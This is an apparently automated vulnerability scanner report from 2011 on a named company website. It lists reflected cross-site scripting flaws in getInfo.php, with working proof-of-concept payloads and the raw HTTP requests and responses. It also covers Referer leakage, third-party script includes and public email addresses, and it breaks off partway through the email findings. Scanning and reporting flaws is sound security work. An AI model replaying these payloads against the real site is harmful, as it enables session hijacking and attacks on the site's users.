equivoice.com, XSS, Cross Site Scripting, REST Parameter, Arbitrary Insertion Point

XSS in www.equivoice.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Thu Feb 10 09:58:40 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.equivoice.com/getInfo.php [ec08a';alert(document_cookie)//5be91f21212 parameter]

1.2. http://www.equivoice.com/getInfo.php [ec08a';alert(document_cookie)//5be91f21212 parameter]

1.3. http://www.equivoice.com/getInfo.php [name of an arbitrarily supplied request parameter]

1.4. http://www.equivoice.com/getInfo.php [name of an arbitrarily supplied request parameter]

2. Cross-domain Referer leakage

3. Cross-domain script include

4. Email addresses disclosed

4.1. http://www.equivoice.com/

4.2. http://www.equivoice.com/about_us.htm

4.3. http://www.equivoice.com/case_studies/cotg.htm

4.4. http://www.equivoice.com/case_studies/index.htm

4.5. http://www.equivoice.com/contact_us.htm

4.6. http://www.equivoice.com/getInfo.php

4.7. http://www.equivoice.com/index.htm

4.8. http://www.equivoice.com/news.htm

4.9. http://www.equivoice.com/newsletter.htm

4.10. http://www.equivoice.com/privacy_policy.htm

4.11. http://www.equivoice.com/products/EquiTREX.htm

4.12. http://www.equivoice.com/products/IP_telephony.htm

4.13. http://www.equivoice.com/products/call_center.htm

4.14. http://www.equivoice.com/products/cisco_colo_connect.htm

4.15. http://www.equivoice.com/products/equi-conferencing.htm

4.16. http://www.equivoice.com/products/equi-t1.htm

4.17. http://www.equivoice.com/products/equi-voip.htm

4.18. http://www.equivoice.com/products/equi_messaging.htm

4.19. http://www.equivoice.com/products/index.htm

4.20. http://www.equivoice.com/products/ip_phone_models.htm

4.21. http://www.equivoice.com/products/moving.htm

4.22. http://www.equivoice.com/products/standalone_callManager.htm

4.23. http://www.equivoice.com/products/telephone_systems.htm

4.24. http://www.equivoice.com/products/updating.htm

4.25. http://www.equivoice.com/rso_article.htm

4.26. http://www.equivoice.com/solutions/IP_telephony.htm

4.27. http://www.equivoice.com/solutions/SOHO_solutions.htm

4.28. http://www.equivoice.com/solutions/call_center.htm

4.29. http://www.equivoice.com/solutions/connectivity_options.htm

4.30. http://www.equivoice.com/solutions/disaster_recovery.htm

4.31. http://www.equivoice.com/solutions/equi-t1.htm

4.32. http://www.equivoice.com/solutions/index.htm

4.33. http://www.equivoice.com/solutions/managed_voip_solutions.htm

4.34. http://www.equivoice.com/solutions/multi-site_business.htm

4.35. http://www.equivoice.com/solutions/single-site_business.htm

5. Credit card numbers disclosed



1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.equivoice.com/getInfo.php [ec08a';alert(document_cookie)//5be91f21212 parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /getInfo.php

Issue detail

The value of the ec08a';alert(document_cookie)//5be91f21212 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9254e"style%3d"x%3aexpression(alert(1))"91c3c424f80 was submitted in the ec08a';alert(document_cookie)//5be91f21212 parameter. This input was echoed as 9254e"style="x:expression(alert(1))"91c3c424f80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /getInfo.php?ec08a';alert(document_cookie)//5be91f21212=19254e"style%3d"x%3aexpression(alert(1))"91c3c424f80&svpage=networksystems HTTP/1.1
Host: www.equivoice.com
Proxy-Connection: keep-alive
Referer: http://www.equivoice.com/getInfo.php?ec08a'%3balert(document.cookie)//5be91f21212=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmb=172246071.4.10.1297352306

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:46:52 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36490

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<table onclick="document.location.href='http://www.equivoice.com/getInfo.php?ec08a';alert(document_cookie)//5be91f21212=19254e"style="x:expression(alert(1))"91c3c424f80&svpage=overview';" id="idSVNavPrimaryItem_overview" class="clsSVNavPrimaryItem clsSVContentClass_overview">
...[SNIP]...

1.2. http://www.equivoice.com/getInfo.php [ec08a';alert(document_cookie)//5be91f21212 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /getInfo.php

Issue detail

The value of the ec08a';alert(document_cookie)//5be91f21212 request parameter is copied into a JavaScript rest-of-line comment. The payload db6ee%0aalert(1)//b685d8c90ca was submitted in the ec08a';alert(document_cookie)//5be91f21212 parameter. This input was echoed as db6ee
alert(1)//b685d8c90ca
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getInfo.php?ec08a';alert(document_cookie)//5be91f21212=1db6ee%0aalert(1)//b685d8c90ca&svpage=networksystems HTTP/1.1
Host: www.equivoice.com
Proxy-Connection: keep-alive
Referer: http://www.equivoice.com/getInfo.php?ec08a'%3balert(document.cookie)//5be91f21212=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmb=172246071.4.10.1297352306

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:46:54 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
var strSVPageRenderViewID = '8746098';
var strSVSyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.equivoice.com/getInfo.php?ec08a';alert(document_cookie)//5be91f21212=1db6ee
alert(1)//b685d8c90ca
');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
fncSVPageTrackingInit();
</script>
...[SNIP]...

1.3. http://www.equivoice.com/getInfo.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /getInfo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 197e9"style%3d"x%3aexpression(alert(1))"d9bf0a393e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 197e9"style="x:expression(alert(1))"d9bf0a393e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /getInfo.php?197e9"style%3d"x%3aexpression(alert(1))"d9bf0a393e4=1 HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:20 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40511

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<table onclick="document.location.href='http://www.equivoice.com/getInfo.php?197e9"style="x:expression(alert(1))"d9bf0a393e4=1&svpage=overview';" id="idSVNavPrimaryItem_overview" class="clsSVNavPrimaryItem clsSVContentClass_overview clsSVNavSelected">
...[SNIP]...

1.4. http://www.equivoice.com/getInfo.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /getInfo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec08a'%3balert(1)//5be91f21212 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec08a';alert(1)//5be91f21212 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getInfo.php?ec08a'%3balert(1)//5be91f21212=1 HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:22 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39979

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
var strSVPageShortcut = 'overview';
var strSVPageRenderViewID = '8745670';
var strSVSyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.equivoice.com/getInfo.php?ec08a';alert(1)//5be91f21212=1');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
fncSVPageTrackingInit();
</script>
...[SNIP]...

2. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /getInfo.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /getInfo.php?ec08a';alert(document_cookie)//5be91f21212=1&svpage=security HTTP/1.1
Host: www.equivoice.com
Proxy-Connection: keep-alive
Referer: http://www.equivoice.com/getInfo.php?ec08a';alert(document_cookie)//5be91f21212=1&svpage=networksystems
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmb=172246071.4.10.1297352306

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:43:39 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36395

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="leftCol1">


<link rel="stylesheet" href='http://cisco.sharedvue.net/content/sharedvue/css/sharedvue-css.aspx' type="text/css" />
<link rel="Stylesheet" href='http://cisco.sharedvue.net/content/sharedvue/css/skins/blue1/style-css.aspx' type="text/css" />

<style type="text/css">
...[SNIP]...
</style>


<script type="text/javascript" language="javascript" src="http://cisco.sharedvue.net/content/sharedvue/scripts/svfunctions-js.aspx"></script>
<script type="text/javascript" language="javascript" src="http://cisco.sharedvue.net/content/sharedvue/scripts/flowplayer.js"></script>
...[SNIP]...
<br /><img src="http://cisco2.sharedvue.net/sharedvue/images/_dot.gif" width="335" height="1" border="0" />

</div>
...[SNIP]...
<div style="position: absolute; left: -10000px; top: 0px;">
<img src="http://cisco.sharedvue.net/Content/Images/_dot.gif"
width="1" height="1" border="20" alt="" id="idSVTick" />

</div>
...[SNIP]...

3. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /getInfo.php

Issue detail

The response dynamically includes the following scripts from other domains:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /getInfo.php HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:05 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39111

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
</style>


<script type="text/javascript" language="javascript" src="http://cisco.sharedvue.net/content/sharedvue/scripts/svfunctions-js.aspx"></script>
<script type="text/javascript" language="javascript" src="http://cisco.sharedvue.net/content/sharedvue/scripts/flowplayer.js"></script>
...[SNIP]...

4. Email addresses disclosed  previous  next
There are 35 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


4.1. http://www.equivoice.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.equivoice.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:37:52 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 22 Jul 2009 17:23:13 GMT
ETag: "108f8-2b1e-46f4ea0380240"
Accept-Ranges: bytes
Content-Length: 11038
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:support@equivoice.com">support@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.2. http://www.equivoice.com/about_us.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /about_us.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about_us.htm HTTP/1.1
Host: www.equivoice.com
Proxy-Connection: keep-alive
Referer: http://www.equivoice.com/products/equi_messaging.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:29 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 16:21:20 GMT
ETag: "106e6-61ee-46b9c485d8000"
Accept-Ranges: bytes
Content-Length: 25070
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:support@equivoice.com">support@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.3. http://www.equivoice.com/case_studies/cotg.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /case_studies/cotg.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /case_studies/cotg.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:03 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:22:49 GMT
ETag: "108d2-5e84-46b9fa7fa1840"
Accept-Ranges: bytes
Content-Length: 24196
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:support@equivoice.com">support@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.4. http://www.equivoice.com/case_studies/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /case_studies/index.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /case_studies/index.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:02 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:20:23 GMT
ETag: "108fb-5425-46b9f9f464fc0"
Accept-Ranges: bytes
Content-Length: 21541
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:support@equivoice.com">support@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.5. http://www.equivoice.com/contact_us.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /contact_us.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact_us.htm HTTP/1.1
Host: www.equivoice.com
Proxy-Connection: keep-alive
Referer: http://www.equivoice.com/about_us.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.4.10.1297352306

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:33 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 11 Aug 2010 17:47:18 GMT
ETag: "688005-5273-48d8fd7405580"
Accept-Ranges: bytes
Content-Length: 21107
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:support@equivoice.com">support@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.6. http://www.equivoice.com/getInfo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /getInfo.php

Issue detail

The following email address was disclosed in the response:

Request

GET /getInfo.php HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:05 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39111

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.7. http://www.equivoice.com/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /index.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:06 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 22 Jul 2009 17:23:13 GMT
ETag: "108f8-2b1e-46f4ea0380240"
Accept-Ranges: bytes
Content-Length: 11038
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:support@equivoice.com">support@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.8. http://www.equivoice.com/news.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /news.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
